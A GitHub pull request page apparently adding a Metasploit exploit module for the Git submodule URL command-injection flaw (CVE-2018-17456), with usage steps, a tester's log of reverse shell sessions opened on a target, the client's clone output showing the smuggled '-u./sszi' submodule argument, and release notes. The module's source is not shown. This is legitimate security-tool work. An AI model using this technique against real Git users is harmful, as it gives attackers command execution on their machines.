New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

git submodule url exec (CVE-2018-17456) #10828

Merged
merged 6 commits into from Nov 14, 2018

Conversation

Projects
None yet
4 participants
@timwr
Contributor

timwr commented Oct 18, 2018

This is a HTTP implementation of the recent git submodule command execution bug.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/http/git_submodule_url_exec
  • set LHOST <tab>
  • exploit
  • Clone the repository, e.g: git clone --recurse-submodules http://YOUR_IP/randomurl.git
  • Verify you get a shell.

Optional improvements (I probably won't have time for this)

  • Have the payload clean up the parent repository (and remove the vulnerability), so that it successfully clones.
  • Support clone via SSH
  • Support non-cmd payloads

@timwr timwr added the module label Oct 18, 2018

@bcoles bcoles added the needs-docs label Oct 18, 2018

timwr added some commits Oct 18, 2018

@bcoles

This comment has been minimized.

Contributor

bcoles commented Oct 18, 2018

I think GitHub's shiny new magic review tool means you can automatically commit changes directly from my review comments.

@bcoles bcoles added docs and removed needs-docs labels Oct 18, 2018

@timwr

This comment has been minimized.

Contributor

timwr commented Oct 18, 2018

Very cool. Thanks @bcoles!

@jrobles-r7 jrobles-r7 self-assigned this Nov 9, 2018

@jrobles-r7 jrobles-r7 merged commit 798d315 into rapid7:master Nov 14, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Nov 14, 2018

msjenkins-r7 added a commit that referenced this pull request Nov 14, 2018

@jrobles-r7

This comment has been minimized.

Contributor

jrobles-r7 commented Nov 14, 2018

(compiled from source) git v2.17.1 on Debian 9.6

msf5 exploit(multi/http/git_submodule_url_exec) > 
[*] Started reverse TCP handler on 172.22.222.147:4444 
[*] Using URL: http://0.0.0.0:8080/4tJoOx
[*] Local IP: http://192.168.171.150:8080/4tJoOx
[*] Server started.
[*] Malicious Git URI is http://172.22.222.147:8080/jsep.git
[*] git clone --recurse-submodules http://172.22.222.147:8080/jsep.git
[*] Command shell session 1 opened (172.22.222.147:4444 -> 172.22.222.145:38980) at 2018-11-14 12:42:22 -0600
[*] Command shell session 2 opened (172.22.222.147:4444 -> 172.22.222.145:38982) at 2018-11-14 12:42:22 -0600
sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux db 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
whoami
msfdev
exit
[*] 172.22.222.145 - Command shell session 1 closed.

On client side

msfdev@db:~/bin$ ./git clone --recurse-submodules http://172.22.222.147:8080/jsep.git
Cloning into 'jsep'...
Submodule 'lrsxnt:nwzlf' (-u./sszi) registered for path 'lrsxnt:nwzlf'
Cloning into 'nwzlf'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./sszi' into submodule path '/home/msfdev/bin/jsep/lrsxnt:nwzlf' failed
Failed to clone 'lrsxnt:nwzlf'. Retry scheduled
Cloning into 'nwzlf'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./sszi' into submodule path '/home/msfdev/bin/jsep/lrsxnt:nwzlf' failed
Failed to clone 'lrsxnt:nwzlf' a second time, aborting
@jrobles-r7

This comment has been minimized.

Contributor

jrobles-r7 commented Nov 14, 2018

Release Notes

The exploits/multi/http/git_submodule_url_exec module has been added to the framework. This generates a response that causes vulnerable Git clients to execute an injected command when using the --recurse-submodules option while attempting to clone a repository (CVE-2018-17456).

@timwr timwr deleted the timwr:gitsubmodule_url_exec branch Nov 14, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment